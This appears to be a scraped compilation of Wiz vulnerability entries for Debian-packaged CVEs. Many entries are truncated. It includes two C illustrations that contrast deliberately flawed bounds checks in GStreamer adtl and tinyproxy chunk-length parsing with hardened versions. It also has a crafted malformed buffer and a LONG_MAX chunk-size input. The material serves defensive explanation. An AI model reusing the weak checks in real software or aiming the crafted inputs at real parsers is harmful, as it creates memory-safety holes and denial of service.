a page leakage but didn't free the page array, release it as well.
Source : NVD
Published March 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fde
linux-oem-6.17
Sources
NVD
Debian 14 Has Fix Added at: Mar 19, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Mar 20, 202
## CVE-2026-5317 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
A security flaw has been discovered in Nothings stb up to 1.22. This affects the function start_decoder of the file stb_vorbis.c. The manipulation results in out-of-bounds write. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 5.3
Published April 2, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
l
## CVE-2025-48429 [HIGH, CVSS 7.4]: Linux Debian vulnerability analysis and mitigation (Wiz)
An out-of-bounds read vulnerability exists in the RLECodec::DecodeByStreams functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to leaking heap data. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
Score 9.1
Published December 16, 2025
Severity CRITICAL
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity CRITICAL No Fix A
## CVE-2025-62599 [HIGH, CVSS 8.6]: Linux Debian vulnerability analysis and mitigation (Wiz)
Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 3.4.1, 3.3.1, and 2.6.11, when the security mode is enabled, modifying the DATA Submessage within an SPDP packet sent by a publisher causes an Out-Of-Memory (OOM) condition, resulting in remote termination of Fast-DDS. If the fields of PID_IDENTITY_TOKEN or PID_PERMISSION_TOKEN in the DATA Submessage — specifically by tampering with the length field in readPropertySeq — are modified, an integer overflow occurs, leading to an OOM during the resize operation. Versions 3.4.1, 3.3.1, and 2.6.11 patch the issue.
Source : NVD
Score 1.7
Published February 3, 2026
Severity LOW
## CVE-2026-24885 [MEDIUM, CVSS 5.7]: Linux Debian vulnerability analysis and mitigation (Wiz)
Kanboard is project management software focused on the Kanban methodology. Prior to 1.2.50, a Cross-Site Request Forgery (CSRF) vulnerability exists in the ProjectPermissionController within the Kanboard application. The application fails to strictly enforce the application/json Content-Type for the changeUserRole action. Although the request body is JSON, the server accepts text/plain, allowing an attacker to craft a malicious form using the text/plain attribute, which allows unauthorized modification of project user roles if an authenticated admin visits a malicious site. This vulnerability is fixed in 1.2.50.
Source : NVD
Score 8
Published February 10, 2026
Severity HIGH
CNA Score 5.7
Affected Technologies
## CVE-2022-50759 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
media: i2c: ov5648: Free V4L2 fwnode data on unbind
The V4L2 fwnode data structure doesn't get freed on unbind, which leads to
a memleak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fde
linux-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Dec
## CVE-2025-53618 [HIGH, CVSS 7.4]: Linux Debian vulnerability analysis and mitigation (Wiz)
grayscale_convert
Source : NVD
Score 9.1
Published December 16, 2025
Severity CRITICAL
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity CRITICAL No Fix Added at: Dec 18, 2025
Echo Severity CRITICAL No Fix Added at: Dec 18, 2025
## CVE-2023-54109 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
media: rcar_fdp1: Fix refcount leak in probe and remove function
rcar_fcp_get() takes a reference, which should be balanced with
rcar_fcp_put(). Add missing rcar_fcp_put() in fdp1_remove and
the error paths of fdp1_probe() to fix this.
[hverkuil: resolve merge conflict, remove() is now void]
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-iot
linux-xilinx-zynqmp
Sources
## CVE-2024-31884 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
Incorrect usage of certificate checking via Pybind
Source : NVD
Published January 21, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ceph
Sources
NVD
Debian 11, 14 Has Fix Added at: Jan 22, 2026
Debian 12, 13 No Fix Added at: Jan 22, 2026
Echo Has Fix Added at: Jan 22, 2026
Ubuntu 20.04, 22.04, 24.04, 25.10 Severity MEDIUM Has Fix Added at: Jan 29, 2026
## CVE-2006-10002 [HIGH, CVSS 7.5]: Linux Debian vulnerability analysis and mitigation (Wiz)
XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size, causing heap corruption (double free or corruption) and crashes.
With a :utf8 PerlIO layer, parse_stream() in Expat.xs could overflow the XML input buffer because Perl's read() returns decoded characters while SvPV() gives back multi-byte UTF-8 bytes that can exceed the pre-allocated buffer size. This can cause heap corruption (double free or corruption) and crashes.
Source : NVD
Score 7.5
Published March 19, 2026
Severity HIGH
CNA Score 9.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
## CVE-2026-4016 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
A security vulnerability has been detected in GPAC 26.03-DEV. Affected by this vulnerability is the function svgin_process of the file src/filters/load_svg.c of the component SVG Parser. The manipulation leads to out-of-bounds write. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The identifier of the patch is 7618d7206cdeb3c28961dc97ab0ecabaff0c8af2. It is suggested to install a patch to address this issue.
Source : NVD
Score 4.8
Published March 12, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perce
## CVE-2025-68216: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: BPF: Disable trampoline for kernel module function trace
The current LoongArch BPF trampoline implementation is incompatible
with tracing functions in kernel modules. This causes several severe
and user-visible problems:
- bpf_selftests/module_attach: Kernel lockup when a BPF program is attached to a module function [1].
- Critical kernel modules like WireGuard experience traffic disruption when their functions are traced with fentry [2].
Given the severity and the potential for other unknown side-effects, it
is safest to disable the feature entirely for now. This patch prevents
the BPF subsystem from allowing trampoline attachments to kerne
## CVE-2025-68315 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to detect potential corrupted nid in free_nid_list
As reported, on-disk footer.ino and footer.nid are the same and
out-of-range, let's add sanity check on f2fs_alloc_nid() to detect
any potential corruption in free_nid_list.
Source : NVD
Score 7.8
Published December 16, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-oracle
linux-oracle-6.14
Sources
NVD
Debian 11, 12 No F
## CVE-2026-5186 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
A weakness has been identified in Nothings stb up to 2.30. This impacts the function stbi__load_gif_main of the file stb_image.h of the component Multi-frame GIF File Handler. This manipulation causes double free. The attack requires local access. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 4.8
Published March 31, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.2
Exploitation Probability (EPSS) N/A
## CVE-2026-23371: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
sched/deadline: Fix missing ENQUEUE_REPLENISH during PI de-boosting
Running stress-ng --schedpolicy 0 on an RT kernel on a big machine
might lead to the following WARNINGs (edited).
sched: DL de-boosted task PID 22725: REPLENISH flag missing
WARNING: CPU: 93 PID: 0 at kernel/sched/deadline.c:239 dequeue_task_dl+0x15c/0x1f8
... (running_bw underflow)
Call trace:
dequeue_task_dl+0x15c/0x1f8 (P)
dequeue_task+0x80/0x168
deactivate_task+0x24/0x50
push_dl_task+0x264/0x2e0
dl_task_timer+0x1b0/0x228
__hrtimer_run_queues+0x188/0x378
hrtimer_interrupt+0xfc/0x260
...
The problem is that when a SCHED_DEADLINE task (lock holder) is
changed to a lower priority
## CVE-2026-22891 [CRITICAL, CVSS 9.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
A heap-based buffer overflow vulnerability exists in the Intan CLP parsing functionality of The Biosig Project libbiosig 3.9.2 and Master Branch (db9a9a63). A specially crafted Intan CLP file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
Score 9.8
Published March 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at:
## CVE-2025-71109 [MEDIUM, CVSS 5.5]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
MIPS: ftrace: Fix memory corruption when kernel is located beyond 32 bits
Since commit e424054000878 ("MIPS: Tracing: Reduce the overhead of
dynamic Function Tracer"), the macro UASM_i_LA_mostly has been used,
and this macro can generate more than 2 instructions. At the same
time, the code in ftrace assumes that no more than 2 instructions can
be generated, which is why it stores them in an int[2] array. However,
as previously noted, the macro UASM_i_LA_mostly (and now UASM_i_LA)
causes a buffer overflow when _mcount is beyond 32 bits. This leads to
corruption of the variables located in the __read_mostly section.
This corruption was observed becau
## CVE-2026-4985 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
A vulnerability was identified in dloebl CGIF up to 0.5.2. This vulnerability affects the function cgif_addframe of the file src/cgif.c of the component GIF Image Handler. The manipulation of the argument width/height leads to integer overflow. The attack may be initiated remotely. The identifier of the patch is b0ba830093f4317a5d1f345715d2fa3cd2dab474. It is suggested to install a patch to address this issue.
Source : NVD
Score 5.3
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.1
Exploitation Probability (EPSS) N/
## CVE-2025-68187 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: mdio: Check regmap pointer returned by device_node_to_regmap()
The call to device_node_to_regmap() in airoha_mdio_probe() can return
an ERR_PTR() if regmap initialization fails. Currently, the driver
stores the pointer without validation, which could lead to a crash
if it is later dereferenced.
Add an IS_ERR() check and return the corresponding error code to make
the probe path more robust.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
E
## CVE-2022-50711 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: mtk_eth_soc: fix possible memory leak in mtk_probe()
If mtk_wed_add_hw() has been called, mtk_wed_exit() needs be called
in error path or removing module to free the memory allocated in
mtk_wed_add_hw().
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix A
## CVE-2026-28384 [CRITICAL] CVSS 9.4 (Wiz): Linux Debian vulnerability analysis and mitigation
An improper sanitization of the compression_algorithm parameter in Canonical LXD allows an authenticated, unprivileged user to execute commands as the LXD daemon on the LXD server via API calls to the image and backup endpoints. This issue affected LXD from 4.12 through 6.6 and was fixed in the snap versions 5.0.6-e49d9f4 (channel 5.0/stable), 5.21.4-1374f39 (channel 5.21/stable), and 6.7-1f11451 (channel 6.0 stable). The channel 4.0/stable is not affected as it contains version 4.0.10.
Source : NVD
Score 9.4
Published March 12, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
## CVE-2025-24531 [MEDIUM] CVSS 6.7 (Wiz): Linux Debian vulnerability analysis and mitigation
In OpenSC pam_pkcs11 before 0.6.13, pam_sm_authenticate() wrongly returns PAM_IGNORE in many error situations (such as an error triggered by a smartcard before login), allowing authentication bypass.
Source : NVD
Score 6.7
Published January 16, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pam-pkcs11
Sources
NVD
Debian 12, 13 Severity MEDIUM Has Fix Added at: Feb 09, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
Echo Severity MEDIUM H
## CVE-2025-62601 [LOW] CVSS 1.7 (Wiz): Linux Debian vulnerability analysis and mitigation
PID_IDENTITY_TOKEN
PID_PERMISSIONS_TOKEN
str_size
readString
readBinaryProperty
std::vector::resize
Source : NVD
Score 1.7
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## CVE-2026-23470 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/imagination: Fix deadlock in soft reset sequence
The soft reset sequence is currently executed from the threaded IRQ
handler, hence it cannot call disable_irq() which internally waits
for IRQ handlers, i.e. itself, to complete.
Use disable_irq_nosync() during a soft reset instead.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 13 N
## CVE-2026-1940 [MEDIUM] CVSS 5.1 (Wiz): Linux Debian vulnerability analysis and mitigation
An incomplete fix for CVE-2024-47778 allows an out-of-bounds read in gst_wavparse_adtl_chunk() function. The patch added a size validation check lsize + 8 > size, but it does not account for the GST_ROUND_UP_2(lsize) used in the actual offset calculation. When lsize is an odd number, the parser advances more bytes than validated, causing OOB read.
Source : NVD
Score 5.1
Published March 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gstreamer
gstreamer
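The CVE-2026-1940 entry above describes a bounds check that validates `lsize + 8` while the parser advances by `GST_ROUND_UP_2(lsize) + 8`. The following is an added illustration written for this page, not GStreamer's code: a minimal walker over a constructed "adtl" sub-chunk list, run once with the incomplete check and once with a check that validates the same padded quantity the parser steps over. `ROUND_UP_2`, `adtl_step`, `adtl_fits_weak`, `adtl_fits_safe`, `walk_adtl` and the sample buffers are hypothetical names chosen here.

```c
#include <stdint.h>

/* Added illustration of the CVE-2026-1940 check mismatch; not GStreamer's
 * code. ROUND_UP_2 mirrors what GST_ROUND_UP_2 does (round up to even);
 * every function and buffer name below is hypothetical. */
#define ROUND_UP_2(n) ((((uint64_t)(n)) + 1) & ~(uint64_t)1)

/* Bytes the parser actually steps over for one sub-chunk: 8-byte header
 * (4-byte id + 4-byte length) plus the payload padded to an even size. */
uint64_t adtl_step(uint32_t lsize)
{
    return 8 + ROUND_UP_2(lsize);
}

/* The incomplete fix's check: compares the unpadded payload against the
 * bytes remaining (remaining counts the 8-byte header too). */
int adtl_fits_weak(uint32_t lsize, uint64_t remaining)
{
    return (uint64_t)lsize + 8 <= remaining;
}

/* Corrected check: validate exactly the quantity the parser advances by. */
int adtl_fits_safe(uint32_t lsize, uint64_t remaining)
{
    return adtl_step(lsize) <= remaining;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Walks the sub-chunks of an "adtl" LIST body with the supplied bounds
 * check. Returns the number of sub-chunks consumed, or -1 if a sub-chunk
 * passed the check yet the step would run past the end of the buffer,
 * which is where the real parser would read out of bounds. */
int walk_adtl(const uint8_t *data, uint64_t size, int (*fits)(uint32_t, uint64_t))
{
    uint64_t remaining = size;
    int count = 0;
    while (remaining >= 8) {
        const uint8_t *p = data + (size - remaining);
        uint32_t lsize = le32(p + 4);   /* p[0..3] is the id (labl/note/ltxt) */
        if (!fits(lsize, remaining))
            break;                      /* truncated sub-chunk: stop cleanly */
        uint64_t step = adtl_step(lsize);
        if (step > remaining)
            return -1;                  /* validated, yet steps past the end */
        remaining -= step;
        count++;
    }
    return count;
}

/* Constructed inputs. sample_odd declares a 5-byte (odd) payload and is
 * exactly 13 bytes: header + 5, with no pad byte present in the buffer. */
const uint8_t sample_odd[13]    = { 'l','a','b','l', 5,0,0,0, 'c','u','e','1','\0' };
/* sample_even: 4-byte payload, no padding needed. */
const uint8_t sample_even[12]   = { 'n','o','t','e', 4,0,0,0, 'a','b','c','d' };
/* sample_padded: the same 5-byte payload followed by its pad byte. */
const uint8_t sample_padded[14] = { 'l','a','b','l', 5,0,0,0, 'c','u','e','1','\0', 0 };
```

With `sample_odd`, the weak check accepts the sub-chunk (5 + 8 == 13) but the parser steps 14 bytes, one past the buffer; the corrected check refuses it and the walk stops with nothing consumed. Even and properly padded inputs behave identically under both checks, which is why the discrepancy is easy to miss in testing.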
## CVE-2026-23280 [HIGH] CVSS 7.8 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Prevent ubuf size overflow
The ubuf size calculation may overflow, resulting in an undersized
allocation and possible memory corruption.
Use check_add_overflow() helpers to validate the size calculation before
allocation.
Source : NVD
Score 7.8
Published March 25, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
Debian 14 Severity HIGH Has Fix Added at: Mar 26, 2026
## CVE-2026-23393 [HIGH] CVSS 7.8 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bridge: cfm: Fix race condition in peer_mep deletion
When a peer MEP is being deleted, cancel_delayed_work_sync() is called
on ccm_rx_dwork before freeing. However, br_cfm_frame_rx() runs in
softirq context under rcu_read_lock (without RTNL) and can re-schedule
ccm_rx_dwork via ccm_rx_timer_start() between cancel_delayed_work_sync()
returning and kfree_rcu() being called.
The following is a simple race scenario:
cpu0 cpu1
mep_delete_implementation()
cancel_delayed_work_sync(ccm_rx_dwork);
br_cfm_frame_rx()
// peer_mep still in hlist
if (peer_mep->ccm_defect)
ccm_rx_timer_start()
queue_delayed_work(ccm_rx_dwork)
hlist_del_rcu(&peer_mep->head);
kfr
## CVE-2026-25530 [MEDIUM] CVSS 4.3 (Wiz): Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, the getSwimlane API method lacks project-level authorization, allowing authenticated users to access swimlane data from projects they cannot access. This vulnerability is fixed in 1.2.50.
Source : NVD
Score 4.3
Published February 10, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kanboard
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Feb 11, 2026
## CVE-2025-66003 [HIGH] CVSS 7.3 (Wiz): Linux Debian vulnerability analysis and mitigation
An External Control of File Name or Path vulnerability in smb4k allows local users to perform a local root exploit via the smb4k mounthelper if they can access and control the contents of a Samba share. This issue affects smb4k: from ? before 4.0.5.
Source : NVD
Score 7.3
Published January 8, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
smb4k
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 11, 2025
Debian 13, 14 Has Fix Added at: Dec 11, 2025
Echo Has Fix Added at:
## CVE-2025-66047 [CRITICAL] CVSS 9.8 (Wiz): Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. When Tag is 131
Source : NVD
Score 9.8
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12,
## CVE-2026-3945 [HIGH] CVSS 8.7 (Wiz): Linux Debian vulnerability analysis and mitigation
An integer overflow vulnerability in the HTTP chunked transfer encoding parser in tinyproxy up to and including version 1.11.3 allows an unauthenticated remote attacker to cause a denial of service (DoS). The issue occurs because chunk size values are parsed using strtol() without properly validating overflow conditions (e.g., errno == ERANGE). A crafted chunk size such as 0x7fffffffffffffff (LONG_MAX) bypasses the existing validation check (chunklen < 0), leading to a signed integer overflow during arithmetic operations (chunklen + 2). This results in incorrect size calculations, causing the proxy to attempt reading an extremely large amount of request-body data and holding worker connections open indefinitely. An att
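The CVE-2026-3945 description above names the exact pattern: `strtol()` on the chunk-size line, a sign-only check, and a later `chunklen + 2`. As an added example (written for this page, not tinyproxy's source), here is that parse in the shape the advisory describes beside a hardened version. Function names and the `max_chunk` bound are hypothetical; the point is that a bare `errno == ERANGE` check is necessary but not sufficient, because an exact `LONG_MAX` parses without overflow and only fails at the later addition.

```c
#include <errno.h>
#include <limits.h>
#include <stdlib.h>

/* Added illustration of the CVE-2026-3945 parsing flaw; not tinyproxy's
 * source. Function names and the max_chunk bound are hypothetical. */

/* The shape the advisory describes: strtol() with only a sign check.
 * strtol() clamps to LONG_MAX on overflow and reports it through errno,
 * but errno is never consulted, and an exact LONG_MAX needs no overflow
 * at all to pass "chunklen < 0". */
long parse_chunklen_weak(const char *line)
{
    char *end;
    long chunklen = strtol(line, &end, 16);
    if (chunklen < 0)
        return -1;
    return chunklen;
}

/* Hardened parse: reset errno, reject ERANGE, reject an empty digit run,
 * and bound the value so that the later "+ 2" for the chunk's trailing
 * CRLF cannot wrap. A protocol-level cap (max_chunk) is the real defence;
 * the LONG_MAX - 2 test only makes the arithmetic hazard explicit. */
long parse_chunklen_safe(const char *line, long max_chunk)
{
    char *end;
    errno = 0;
    long chunklen = strtol(line, &end, 16);
    if (errno == ERANGE)          /* did not fit in a long */
        return -1;
    if (end == line)              /* no hex digits consumed */
        return -1;
    if (chunklen < 0 || chunklen > max_chunk)
        return -1;
    if (chunklen > LONG_MAX - 2)  /* chunklen + 2 would overflow */
        return -1;
    return chunklen;
}

/* The downstream computation from the advisory, with the overflow made
 * observable: returns 1 if chunklen + 2 wraps, 0 otherwise. */
int chunklen_plus_crlf_overflows(long chunklen)
{
    long total;
    return __builtin_add_overflow(chunklen, 2L, &total);
}
```

Feeding `7fffffffffffffff` to the weak parser yields `LONG_MAX`, which passes the sign check and then wraps at `chunklen + 2`; the hardened parser rejects it on the size cap (or, with no cap, on the `LONG_MAX - 2` test), and rejects a longer digit string on `ERANGE`.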
## CVE-2026-1485 [LOW] CVSS 2.8 (Wiz): Linux Debian vulnerability analysis and mitigation
A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.
Source : NVD
Score 2.8
Published January 27, 2026
Severity LOW
CNA Score 2.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
## CVE-2022-50810 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rapidio: devices: fix missing put_device in mport_cdev_open
When kfifo_alloc fails, the refcount of chdev->dev is left incremental.
We should use put_device(&chdev->dev) to decrease the ref count of
chdev->dev to avoid refcount leak.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-5.4
linux-azure
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31, 2025
## CVE-2022-50785 [MEDIUM] CVSS 5.3 (Wiz): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
fsi: occ: Prevent use after free
Use get_device and put_device in the open and close functions to
make sure the device doesn't get freed while a file descriptor is
open.
Also, lock around the freeing of the device buffer and check the
buffer before using it in the submit function.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-ibm-5.15
linux-nvidia-tegra-5.15
Sources
## CVE-2026-25924 [HIGH] CVSS 8.4 (Wiz): Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, a security control bypass vulnerability in Kanboard allows an authenticated administrator to achieve full Remote Code Execution (RCE). Although the application correctly hides the plugin installation interface when the PLUGIN_INSTALLER configuration is set to false, the underlying backend endpoint fails to verify this security setting. An attacker can exploit this oversight to force the server to download and install a malicious plugin, leading to arbitrary code execution. This vulnerability is fixed in 1.2.50.
